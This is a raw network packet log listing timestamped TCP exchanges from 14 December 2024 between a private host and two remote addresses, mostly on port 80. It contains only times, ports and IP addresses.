Dec 14, 2024 12:56:24.579118967 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.579225063 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.579302073 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.579379082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.579943895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.580063105 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.580106020 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.580305099 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.580787897 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.580888033 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.580945015 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.581353903 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.581654072 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.581769943 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.582003117 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.582463980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.582612991 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.582668066 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.582811117 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.583333015 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.583436966 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.583523035 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.584162951 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.584265947 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.584321022 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.584551096 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.584990978 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.585139036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.585182905 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.585437059 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.586011887 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.586215973 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.586253881 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.586357117 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.586698055 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.586857080 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.586868048 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.587142944 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.587532997 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.587671995 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.587958097 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.588040113 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.588521957 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.588615894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.588645935 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.588799000 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.589308977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.589359999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.589428902 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.589428902 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.590226889 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.590568066 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.590609074 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.590907097 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.591020107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.591101885 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.591142893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.591641903 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.591726065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.591898918 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.592134953 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.592283964 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.592653990 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.592746973 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.592791080 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.593349934 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.593396902 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.593497992 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.593534946 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.593611002 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.594269991 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.594357967 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.594477892 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.594696999 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.595041037 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.595192909 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.743390083 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.743444920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.743684053 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.743874073 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.743932962 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.744259119 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.744524002 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.744565964 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.744620085 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.744663954 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.745356083 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.745409966 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.745471001 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.745500088 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.745891094 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.746138096 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.746517897 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.746722937 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.746776104 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.746921062 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.747528076 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.747649908 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.747879028 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.747879028 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.748364925 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.748461962 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.748657942 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.748657942 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.749259949 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.749311924 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.750068903 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.750087023 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.750087023 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.750166893 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.750224113 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.750372887 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.750998974 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.751147032 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.751173019 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.751235008 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.751753092 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.751878977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.751898050 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.751988888 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.752753019 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.752842903 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.753453970 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.753453970 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.753468037 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.753624916 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.753632069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.754307985 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.754472971 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.754507065 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.754507065 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.754618883 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.755095959 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.755234003 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.755264044 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.755345106 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.755939007 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.756057978 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.756108046 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.756371021 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.756789923 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.756902933 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.756941080 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.757656097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.757725000 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.757762909 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.757769108 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.757921934 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.758469105 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.758572102 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.758826971 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.759394884 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.759428978 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.759475946 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.759617090 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.760155916 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.760296106 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.760452032 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.760994911 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.761096954 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.761881113 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.761974096 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.762011051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.762068987 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.762614965 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.762756109 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.762842894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.762958050 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.763382912 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.763572931 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.763613939 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.763679981 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.763799906 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.764381886 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.764503002 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.764657974 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.765229940 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.765352011 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.765507936 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.766077042 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.766114950 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.766140938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.766232967 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.766967058 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.767054081 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.767112970 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.767112970 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.767869949 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.767980099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.768070936 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.768210888 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.768816948 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.768979073 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.769016981 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.769109964 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.769601107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.769705057 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.769862890 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.770288944 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.770473957 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.770661116 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.771131992 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.771259069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.771328926 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.771328926 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.771989107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.772113085 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.772255898 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.772820950 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.772933006 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.773124933 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.773646116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.773696899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.773753881 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.774470091 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.774552107 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.774596930 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.774614096 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.774852037 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.775305033 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.775373936 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.775518894 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.776164055 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.776283979 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.776323080 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.776607037 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.777012110 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.777131081 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.777187109 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.777857065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.777967930 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.778055906 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.778055906 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.778690100 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.778815985 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.778853893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.778934956 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.779542923 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.779695034 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.779699087 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.780041933 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.780374050 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.780495882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.780595064 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.780596018 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.781238079 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.781393051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.782063007 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.782154083 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.782191038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.782603025 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.782603025 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.782902956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.783034086 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.783070087 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.783103943 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.783792973 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.783960104 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.783976078 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.784107924 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.784770012 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.784878016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.784914970 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.785047054 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.785478115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.785619020 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.785710096 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.785891056 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.786339998 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.786463976 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.786499977 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.786811113 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.787116051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.787391901 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.935095072 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.935348034 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.935389042 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.935425997 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.935483932 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.935527086 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.935770035 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.936265945 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.936419964 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.936465025 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.937100887 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.937144041 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.937216043 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.937993050 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.938030958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.938043118 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.938777924 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.938826084 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.938878059 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.938958883 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.939711094 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.939764023 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.939836979 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.940383911 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:24.940502882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.940547943 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:24.940634012 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.940639019 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.940705061 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.941337109 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.941546917 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.942152977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.942395926 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.942459106 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.942519903 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:24.942519903 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.942529917 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:24.942559958 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.942935944 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:24.942975044 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.943116903 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.943145990 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.943365097 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.943847895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.943948984 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.944098949 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.944098949 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.944705009 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.944808960 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.944808960 CET	49804	443	192.168.2.4	23.55.153.106
Dec 14, 2024 12:56:24.944834948 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.944947958 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.945616961 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.945698023 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.945724010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.946063995 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.946365118 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.946532011 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.946541071 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.947285891 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.947334051 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.947410107 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.947510004 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.947510004 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.948122978 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.948225975 CET	49796	80	192.168.2.4	185.215.113.16
